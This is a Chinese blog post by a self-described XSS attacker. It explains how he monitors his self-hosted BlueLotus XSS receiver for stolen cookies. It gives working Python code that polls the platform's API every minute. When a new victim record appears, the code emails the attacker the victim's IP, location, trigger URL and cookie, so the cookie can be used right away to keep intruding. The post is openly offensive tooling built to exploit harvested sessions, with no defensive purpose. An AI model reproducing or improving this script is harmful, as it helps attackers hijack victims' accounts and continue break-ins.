我是一个xsser,在渗透中需要频繁用到xss漏洞,又不敢用别人搭的平台,于是自己买服务器找源码搭建了个人版的平台,因为网站空间的问题,导致配置不了发信。没有了发信提醒,总是错过第一时间利用盗取的cookie继续渗透。

一.分析XSS平台功能


我用的平台是蓝莲花战队编写的轻量级无数据库开源xss平台,项目地址:BlueLotus_XSSReceiver
在api.php中分别调用了两个函数来以json的方式取出所有记录时间戳(id_list)和所有记录的详细信息(list)
if ( isset( $_GET['cmd'] ) ) {
    switch ( $_GET['cmd'] ) {
        //获取所有记录包括详细信息
        case 'list':
            echo json_encode( list_xss_record_detail() );
            break;
        
        //只获取时间戳(索引id)
        case 'id_list':
            echo json_encode( list_xss_record_id() );
            break;

三条时间戳分别对应着三条详细信息:

//?api=id_list

//?api=list

二.使用Python监听平台


要实现监听,首先要考虑要注意哪些点和如何实现功能:
1.程序使用的session过期了怎么办
2.程序频繁发送请求导致网站死了如何解决
3.如何获取判断平台是否收到新的cookie
4.收到cookie后以什么样的方式提醒
 
其实想了一下还有很多疑虑,大概想一下实现功能的答案
 
1.程序的监听功能是通过每分钟发请求包来构成的,如果一直发请求包,服务端session一直都不会失效。类似于保持回话攻击。
2.设置每分钟请求一次,如果因不可抗拒的原因网站死掉了的话,再每100秒请求一次判断网站是否恢复。
3.每次通过请求id_list获取时间戳的个数,再判断是否大于上次请求时间戳的个数,若为真,则请求list取出最新一条的详细信息
4.本来想的是通过短信的方式提醒,后来发现短信太贵了,买不起,又想用qq机器人的方式在qq上提醒,但是想到需要qq机器人一直在线的话还需要一台win服务器。最后只能通过邮件的提醒了 。
 
解决了以上的问题后,写出来了一个demo:
#!/use/bin/python
# -*- coding:utf-8 -*-
import requests,json,time
while True:
  cookie = {
    'Cookie': 'PHPSESSID=*******************'
  }
  id_list = 'http://xssir.org/api.php?cmd=id_list'
  List = 'http://xssir.org/api.php?cmd=list'
  id_list_r = requests.get(id_list,cookies=cookie,timeout=20)
  time.sleep(10)
  id_list__r = requests.get(id_list,cookies=cookie,timeout=20)
  if len(id_list_r.json()) != len(id_list__r.json()): #判断长度是否跟上次一致若一致则获取详细信息
    List_r = requests.get(List,cookies=cookie)
    List_json = List_r.json()
    List_json = List_json[0]
    print List_json['user_IP']

 

判断id_list是否和前一次请求的list长度相等,如果相等再访问?cmd=list取详细值的第一条的user_IP,也就是被xss者的IP。
 
在这里不得不要说一下写脚本过程中遇到一个巨巨巨巨巨巨巨巨巨巨巨巨巨巨巨巨坑,在调试过程中,使用程序发包请求xss平台就自动退出,一开始我以为是程序出问题了,后来调试了好久不行,后来去看程序的源码发现了判断了这个:
if ( !(isset($_SESSION['isLogin']) && $_SESSION['isLogin'] === true && isset($_SESSION['user_agent']) && $_SESSION['user_agent'] != "" && $_SESSION['user_agent'] === $_SERVER['HTTP_USER_AGENT']) ) {
    $_SESSION['isLogin']    = false;
    $_SESSION['user_IP']    = "";
    $_SESSION['user_agent'] = "";
    session_unset();
    session_destroy();
    header("Location: login.php");
    exit();
}

if ( ADMIN_IP_CHECK_ENABLE && !(isset($_SESSION['user_IP']) && $_SESSION['user_IP'] != "" && $_SESSION['user_IP'] === getRealIP()) ) {
    $_SESSION['isLogin']    = false;
    $_SESSION['user_IP']    = "";
    $_SESSION['user_agent'] = "";
    session_unset();
    session_destroy();
    header("Location: login.php");
    exit();
}

 

不仅会判断IP还会判断ua头,之前程序的ua头是自定义的,心中一万头草泥马奔腾而过。默默注释掉。
把这些解决了就剩下发信提醒了,其实这个没什么知识点,Baidu一大堆用python发信的文章,就说说我遇到的一个小坑吧。
SMTP_SSL
在网易邮箱配置好了以后,写了个简单的发信程序,然后一直报错,并且排查不出来问题。巨气。之后问了一下到群里问了一下,原来是函数用错了。报错的代码
#!/usr/bin/env python3  
#coding: utf-8  
import smtplib  
from email.mime.text import MIMEText  
  
sender = 'm158*******@163.com'  
receiver = '**********@qq.com'  
subject = 'python email test'  
smtpserver = 'smtp.163.com'  
username = 'm158*******@163.com'  
password = '******'  
  
msg = MIMEText('<h1>TEST</h1>','html','utf-8')  
  
msg['Subject'] = subject  
  
smtp = smtplib.SMTP()  
smtp.connect('smtp.163.com')  
smtp.login(username, password)  
smtp.sendmail(sender, receiver, msg.as_string())  
smtp.quit()

因为stmp.163.com是用到了ssl协议。但python中的SMTP走的不是ssl协议所以会报错,解决方法也很简单,直接使用SMTP_SSL()就OK啦~

def send_email(receiver,subject,body):
  if receiver:
    sender = 'Rrrrrr Cookie~ <m158319*****@163.com>'
    smtpserver = 'smtp.163.com'
    username = 'm158319*****@163.com'.encode('utf-8')
    password = '******'
    msg = MIMEText(body,'html','utf-8')
    msg['Subject'] = Header(subject,'utf-8')
    msg['From'] = sender
    msg['To'] = receiver
  try:
    smtp = smtplib.SMTP_SSL(smtpserver,465)
    smtp.ehlo()
    smtp.login(username,password)
    smtp.sendmail(sender,receiver,msg.as_string())
    smtp.quit()
    return True
  except Exception,e:
    print e
    return False

下面来一张运行截图和发信截图吧~

import json,time,requests,smtplib
from requests.exceptions import ConnectTimeout
from email.mime.text import MIMEText
from email.header import Header
Me = '1476755447@qq.com'
header = {
  'Host':'xssir.org',
  'Pragma': 'no-cache',
  'Cache-Control': 'no-cache',
  'User-Agent':' Author:ShePi Team | WWW.LSAFE.ORG',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  'Referer': 'http://xssir.org/login.php?key=******',
  'Accept-Encoding': 'gzip, deflate',
  'Accept-Language': 'zh-CN,zh;q=0.8',
  'Cookie': 'PHPSESSID=********',
  'Connection':' close'
}
Source = 'http://xssir.org//api.php?cmd=list'
Sourcenum = 'http://xssir.org/api.php?cmd=id_list'
def send_email(receiver,subject,body):
  if receiver:
    sender = 'Rrrrrr Cookie~ <m15831*****@163.com>'
    smtpserver = 'smtp.163.com'
    username = 'm158319*****@163.com'.encode('utf-8')
    password = '*****'
    msg = MIMEText(body,'html','utf-8')
    msg['Subject'] = Header(subject,'utf-8')
    msg['From'] = sender
    msg['To'] = receiver
  try:
    smtp = smtplib.SMTP_SSL(smtpserver,465)
    smtp.ehlo()
    smtp.login(username,password)
    smtp.sendmail(sender,receiver,msg.as_string())
    smtp.quit()
    return True
  except Exception,e:
    print e
    return False
def getNewlist(url,header):
  try:
    r = requests.session()
    r = r.get(url,headers=header,timeout=20)
    if r.status_code != 200:
      return '[*]Cookie Be overdue!'
      send_email(Me,'Cookie Invalid!','Cookie Invalid!')
      exit()
      break
    num = r.json()
    time.sleep(60)
    r = requests.session()
    numone = r.get(Sourcenum,headers=header,timeout=20).json()
    if len(num) != len(numone):
      ms = getMessage(Source,header)
      return ms
  except ConnectTimeout,e:
    return '[*]The connection failed 100 seconds after the retry!'
    time.sleep(100)
    getNewlist(Source,header)
def getMessage(url,header):
  try:
    r = requests.session()
    r = r.get(url,headers=header,timeout=20).json()
    json = r[0]
    jsonOne =  json['get_data']
    times = time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(float(json['request_time'])))
    messageList = '''
Receive a new cookie:\n <br>
    Ip:%s <br>
    Ip address:%s <br>
    Time:%s <br>
    Trigger link:%s <br>
    Cookie: %s <br>
    '''%(json['user_IP'],json['location'],times,jsonOne['toplocation'],str(json['cookie_data']).strip('{u}\'').replace('u\'','').replace('\'','') if json['cookie_data'] != [] else 'NULL')
    return messageList
  except ConnectTimeout,e:
    return '[*]The connection failed 100 seconds after the retry!'
    time.sleep(100)
    getNewlist(Source,header)
while True:
  adminss = getNewlist(Source,header)
  if adminss != None:
    print adminss.strip('<br>')
    send_email(Me,'Receive cookie~',adminss)
    print '[*]Receive Cookie the Email~'